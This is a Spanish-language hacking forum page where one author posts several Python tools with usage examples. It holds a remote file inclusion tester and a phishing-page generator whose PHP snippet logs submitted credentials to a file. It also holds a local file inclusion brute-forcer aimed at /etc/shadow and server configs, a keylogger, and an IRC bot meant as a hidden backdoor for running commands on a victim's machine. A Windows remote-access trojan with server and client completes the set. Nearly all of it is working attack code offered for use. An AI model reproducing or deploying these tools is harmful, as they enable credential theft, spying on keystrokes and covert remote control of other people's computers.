Hola a todos. Acabo de hacer un simple verificador de vulnerabilidad RFI #!usr/bin/python #RFI Tester (C) Doddy Hackman import os,sys,urllib2,re def header() : print "\n--== RFI Tester ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def test(web): try: print "\n[+] Testing vulnerability RFI in",web code = toma(web+"http://www.supertangas.com") if(re.findall("Los mejores TANGAS de la red",code,re.I)): print "[+] RFI Detected" else: print "[-] RFI Not Found" except: pass header() if len(sys.argv) != 2 : show() else : test(sys.argv[1]) copyright() #The End
Ejemplo de uso python rfi.py http://127.0.0.1/rfi.php?index=
C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=
--== RFI Tester ==--
[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index= [+] RFI Detected
(C) Doddy Hackman 2010
|
|
|
395
|
Programación / Scripting / [Python] Phising Gen By Doddy H
|
en: 7 Octubre 2011, 01:39 am
|
Hola a todos Acabo de terminar esta tool en python para generar los fakes o phising (si es que asi se escribe) No me dedico mucho a esa parte del hacking , pero hice esta cosa rara porque no tenia nada que hacer xDD. #!usr/bin/python #Phising Gen (C) Doddy Hackman import urllib2,sys,os def savefile(filename,text): file = open(filename,"w") file.write(text) def header() : print "\n\n--== Phising Gen ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n" def toma(web) : return urllib2.urlopen(web).read() def gen(web,new): try: print "\n[+] Working in the phishing" code = toma(web) text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>' print "[+] The fake was save in",new savefile(new,code+"\n\n"+text) except: pass header() if len(sys.argv) != 3 : show() else : gen(sys.argv[1],sys.argv[2]) copyright() #The End
Ejemplo de uso C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php yeah.php
--== Phising Gen ==--
[+] Working in the phishing [+] The fake was save in yeah.php
(C) Doddy Hackman 2010
|
|
|
396
|
Programación / Scripting / [Python] LFI T00l
|
en: 7 Octubre 2011, 01:38 am
|
Hola a todos. Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina es vulnerable entonces el script automaticamente intenta brutear archivos. #!usr/bin/perl #LFI T00l (C) Doddy Hackman import os,sys,urllib2,re files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc'] def header() : print "\n--== LFI T00l ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def fuzz(web): print "\n[+] Fuzzing files...\n" for file in files: code = toma(web+file) if not (re.findall("No such file or directory in",code)): print "[File Found] : ",web,file def test(web): try: print "\n[+] Testing vulnerability LFI in",web code = toma(web+"'") if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)): fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I) print "\n[+] LFI Detected" print "[+] Full Path discloure : ",fpd[0] fuzz(web) else: print "[-] LFI Not Found" except: pass header() if len(sys.argv) != 2 : show() else : test(sys.argv[1]) copyright() #The End
Ejemplo de uso python lfi.py http://127.0.0.1/lfi.php?file=
C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=
--== LFI T00l ==--
[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=
[+] LFI Detected [+] Full Path discloure : C:\xampp\htdocs\lfi.php
[+] Fuzzing files...
(C) Doddy Hackman 2010
|
|
|
397
|
Programación / Scripting / [Python] Simple Keylogger
|
en: 7 Octubre 2011, 01:38 am
|
Un simple keylogger en Python #!usr/bin/python #Simple Keylogger in Python #(C) Doddy Hackman 2011 import pyHook,pythoncom def savefile(name,text): file = open(name,"a") file.write(text+"\n") file.close() def toma(frase): savefile("logs.txt",frase.Key) def capturar(): nave = pyHook.HookManager() nave.KeyDown = toma nave.HookKeyboard() pythoncom.PumpMessages() while 1: capturar() # The End
|
|
|
398
|
Programación / Scripting / [Python] IRC Bot
|
en: 7 Octubre 2011, 01:37 am
|
Hola a todos. Aca les traigo un IRC Bot en Python para poder usar como servidor oculto y mandarselo a una victima para poder controlarla desde un comando canal IRC El comando clave para mandar comandos que despues se muestra el resultado de comando en el chat es #!usr/bin/python #Insane Bot (C) Doddy Hackman 2011 #Version beta 0.00001 import re,socket import subprocess host = "127.0.0.1" canal = "#locos" nick = "bot" irc = socket.socket() try: irc.connect((host,6667)) irc.send("NICK "+nick+"\r\n") irc.send("USER "+nick+" 1 1 1 1\r\n") irc.send("JOIN "+canal+"\r\n") print "[+] Insane Bot Online\n" while 1: code = irc.recv(9999) if re.findall("PING",code): irc.send("PONG "+code.split()[1]+"\r\n") if re.findall("PRIVMSG",code): nick = code.split("!") nick = nick[0].replace(":","") msg = code.split(":")[2:][0] if re.findall("cmdnow",code): cmd = code.split("cmdnow")[1] irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n") rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) if rea: re1 = rea.stdout.read() total = re1.replace("\n","|") irc.send("PRIVMSG "+canal+" : "+total+"\n") else: re2 = rea.stderr.read() total = re2.replace("\n","|") irc.send("PRIVMSG "+canal+" : "+total+"\n") except: print "\n\n[-] Error\n\n" # The End
|
|
|
399
|
Programación / Scripting / [Python] HTTP Console By Doddy H
|
en: 7 Octubre 2011, 01:37 am
|
Bueno , este es un simple programa en python hecho en tk que permite mandar peticiones webs a un servidor en concreto #!usr/bin/python #Console (C) Doddy Hackman 2011 from Tkinter import * import socket global x,socket def execa() : s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((str(host.get()),80)) s.send(cmd.get()+"\r\n") data = s.recv(666) s.close() panel.insert(END,repr(data)) window = Tk() window.title("HTTP Console (C) Doddy Hackman 2011") window.maxsize(width="400",height="350") window.minsize(width="400",height="350") window.configure(background="black") window.configure(cursor="tcross") host = StringVar() cmd = StringVar() panel = Text(window,width=30,height=15,bg="black",fg="red") Label(window,bg="black").grid(row=3) Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4) entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5) Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4) entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5) Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9) Label(window,bg="black").grid(row=19) panel.grid(row=20,column=5) window.mainloop()
|
|
|
400
|
Programación / Scripting / [Python] HellRat By Doddy H
|
en: 7 Octubre 2011, 01:37 am
|
Hola , aca traigo un troyano en python con las siguientes opciones - Ocultar inicio
- Mostrar inicio
- Ocultar barra de tereas
- Mostrar barra de tareas
- Abrir CD
- Cerrar CD
- Ejecutar comandos
- Mostrar informacion
server.py #!usr/bin/python #Hell RAt (C) Doddy Hackman 2011 import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess print "\n\n[+] Online\n\n" slave = socket.socket() slave.bind(("",666)) slave.listen(999) a,b = slave.accept() while True: rex = a.recv(20) if re.findall("getso",rex): z = os.name a.send(z) if re.findall("getpath",rex): h = os.getcwd() a.send(h) if re.findall("ocultarinicio",rex): x = win32gui.FindWindow("Shell_TrayWnd","") win32gui.ShowWindow(x,win32con.SW_HIDE) elif re.findall("mostrarinicio",rex): x = win32gui.FindWindow("Shell_TrayWnd","") win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL) elif re.findall("ocultaricono",rex): x = win32gui.FindWindow(0,"Program Manager") win32gui.ShowWindow(x,win32con.SW_HIDE) elif re.findall("mostraricono",rex): x = win32gui.FindWindow(0,"Program Manager") win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL) elif re.findall("abrircd",rex): ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None) elif re.findall("cerrarcd",rex): ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None) else: rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) if re: a.send(rea.stdout.read()) else: a.send(rea.stderr.read()) # The End
cliente.py #!usr/bin/python #HellRat (C) Doddy Hackman 2011 import os,socket,sys def head(): print "\n\n-- == hELLrAT == --\n\n" def copyright(): print "\n\n(C) Doddy Hackman 2011\n\n" def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def men(): try: ip = raw_input("[+] IP : ") client = socket.socket() client.connect((ip,666)) while True: clean() print "\n\n[+] Welcome to ",ip,"\n\n" print "\n\n[1] Informacion" print "[2] CMD" print "[3] Abrir CD" print "[4] Cerrar CD" print "[5] Ocultar iconos" print "[6] Mostrar iconos" print "[7] Ocultar barra de tareas" print "[8] Mostrar barra de tareas" print "[9] Cambiar IP" print "[10] Salir" op = input("\n\n[Opcion] : ") if op == 1: print "\n\n[+] Informacion\n\n" client.send("getso") so = client.recv(999) client.send("getpath") path = client.recv(999) print "[+] SO : "+so print "[+] Path : "+path raw_input() if op == 2: cmd = raw_input("\n[CMD] : ") client.send(cmd) code = client.recv(999) print code raw_input() if op == 3: client.send("abrircd") if op == 4: client.send("cerrarcd") if op == 5: client.send("ocultaricono") if op == 6: client.send("mostraricono") if op == 7: client.send("ocultarinicio") if op == 8: client.send("mostrarinicio") if op == 9: men() if op == 10: client.close() copyright() raw_input() sys.exit(1) except: print "\n\n[-] Error\n\n" head() men() # The End
|
|
|
|
|
|
|